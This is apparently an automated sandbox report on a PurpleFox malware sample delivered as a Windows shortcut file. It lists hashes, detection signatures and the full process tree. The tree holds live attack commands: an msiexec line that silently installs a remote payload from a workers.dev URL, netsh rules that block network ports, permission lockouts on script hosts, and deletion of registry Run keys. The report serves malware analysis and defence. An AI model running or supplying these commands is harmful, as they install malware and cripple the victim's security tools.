Overview

overview

10

Static

static

1

file.lnk

windows7-x64

10

file.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2023, 15:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.lnk

  • Size

    2KB

  • MD5

    b9c5bbb9e1c14a7d34087b9dab239a8c

  • SHA1

    c71c5c794d76c252c77eae881685108a0a01f5ee

  • SHA256

    2971aa6c623ae9f42fd06a7dcf166598857ff63548937ff663ca972bc40fd7c7

  • SHA512

    7c0ceb15bc72978264fb36810f3b01aae018423227b4edc0fee0321b6a487bfef3964e080a49e6d27099642a74d164d4b662929fb9405a45caacfaeeb89c5db2

Score
10/10
purplefoxdiscoveryevasionrootkittrojan

Malware Config

Signatures

  • Detect PurpleFox MSI 1 IoCs

    Detect PurpleFox MSI.

    rootkit
  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

    rootkittrojanpurplefox
  • Blocklisted process makes network request 1 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 6 IoCs
    discovery
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 44 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\file.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg /q
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 31248651124D86C7F49F74FC291842C4
      2⤵
      • Loads dropped DLL
      PID:692
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B603FC63D05C17C02752C1E98CD0510C M Global\MSI0000
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\SysWOW64\powercfg.exe
        "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1524
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
        3⤵
        • Modifies data under HKEY_USERS
        PID:1608
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
        3⤵
        • Modifies data under HKEY_USERS
        PID:2656
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:936
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1180
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2976
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1640
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2364
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1236
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1916
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2224
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1700
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:3016
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:848
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2968
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2384
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:1656
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2896
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2912
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
        3⤵
        • Modifies data under HKEY_USERS
        PID:2804
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
        3⤵
        • Modifies data under HKEY_USERS
        PID:2000
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
        3⤵
        • Modifies data under HKEY_USERS
        PID:2484
      • C:\Windows\SysWOW64\netsh.exe
        "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
        3⤵
        • Modifies data under HKEY_USERS
        PID:672
      • C:\Windows\SysWOW64\takeown.exe
        "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
        3⤵
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2756
      • C:\Windows\SysWOW64\cacls.exe
        "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
        3⤵
          PID:2824
        • C:\Windows\SysWOW64\takeown.exe
          "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
          3⤵
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:288
        • C:\Windows\SysWOW64\cacls.exe
          "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
          3⤵
            PID:832
          • C:\Windows\SysWOW64\takeown.exe
            "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
            3⤵
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:928
          • C:\Windows\SysWOW64\cacls.exe
            "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
            3⤵
              PID:1448
            • C:\Windows\SysWOW64\takeown.exe
              "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
              3⤵
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:1844
            • C:\Windows\SysWOW64\cacls.exe
              "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
              3⤵
                PID:2448
              • C:\Windows\SysWOW64\takeown.exe
                "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                3⤵
                • Modifies file permissions
                • Suspicious use of AdjustPrivilegeToken
                PID:2660
              • C:\Windows\SysWOW64\cacls.exe
                "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
                3⤵
                  PID:1352
                • C:\Windows\SysWOW64\takeown.exe
                  "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
                  3⤵
                  • Modifies file permissions
                  • Suspicious use of AdjustPrivilegeToken
                  PID:936
                • C:\Windows\SysWOW64\cacls.exe
                  "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
                  3⤵
                    PID:2344
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
                    3⤵
                      PID:2268
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
                      3⤵
                        PID:2336
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
                        3⤵
                          PID:2928
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
                          3⤵
                          • Launches sc.exe
                          PID:2204
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
                          3⤵
                          • Launches sc.exe
                          PID:2652

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Config.Msi\f7665c8.rbs
                      Filesize

                      2KB

                      MD5

                      912a420a4bfb3e048fdc27d90266570e

                      SHA1

                      603344bf7c0103ab1488d1e194488d7f81ffc96b

                      SHA256

                      c2efe33a49a43df37066a396db1a2bc7dc255d5d1dfc3a9b246b61388798d63b

                      SHA512

                      3dbeef6c0d7c0d4136785cfe1bb239138046994cd7870ccb310069fd7050fd133e755eea0b38ff36786866ea52b67eae1818b983b761b890ebf616860fe6f910

                      Download Submit

                    • C:\Windows\Installer\MSI5BA7.tmp
                      Filesize

                      2.9MB

                      MD5

                      eb9a4cf233789b96f940be0186a26988

                      SHA1

                      002a1cee740fa212732379d1f00dbcf7c0cccbf2

                      SHA256

                      24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

                      SHA512

                      725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

                      Download Submit

                    • C:\Windows\Installer\MSI5EC4.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • C:\Windows\Installer\MSI621F.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • C:\Windows\Installer\MSI6319.tmp
                      Filesize

                      537KB

                      MD5

                      d7ec04b009302b83da506b9c63ca775c

                      SHA1

                      6fa9ea09b71531754b4cd05814a91032229834c0

                      SHA256

                      00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

                      SHA512

                      171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

                      Download Submit

                    • C:\Windows\Installer\MSI64EF.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • C:\Windows\Installer\MSI64EF.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • \Windows\Installer\MSI5EC4.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • \Windows\Installer\MSI621F.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • \Windows\Installer\MSI6319.tmp
                      Filesize

                      537KB

                      MD5

                      d7ec04b009302b83da506b9c63ca775c

                      SHA1

                      6fa9ea09b71531754b4cd05814a91032229834c0

                      SHA256

                      00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

                      SHA512

                      171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

                      Download Submit

                    • \Windows\Installer\MSI64EF.tmp
                      Filesize

                      379KB

                      MD5

                      305a50c391a94b42a68958f3f89906fb

                      SHA1

                      4110d68d71f3594f5d3bdfca91a1c759ab0105d4

                      SHA256

                      f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

                      SHA512

                      fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

                      Download Submit

                    • memory/1524-65-0x0000000073690000-0x0000000073C3B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1524-66-0x0000000073690000-0x0000000073C3B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1524-67-0x0000000002760000-0x00000000027A0000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/1524-68-0x0000000002760000-0x00000000027A0000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/1524-69-0x0000000002760000-0x00000000027A0000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/1524-70-0x0000000073690000-0x0000000073C3B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1524-71-0x0000000002760000-0x00000000027A0000-memory.dmp

                      Filesize

                      256KB

                      Download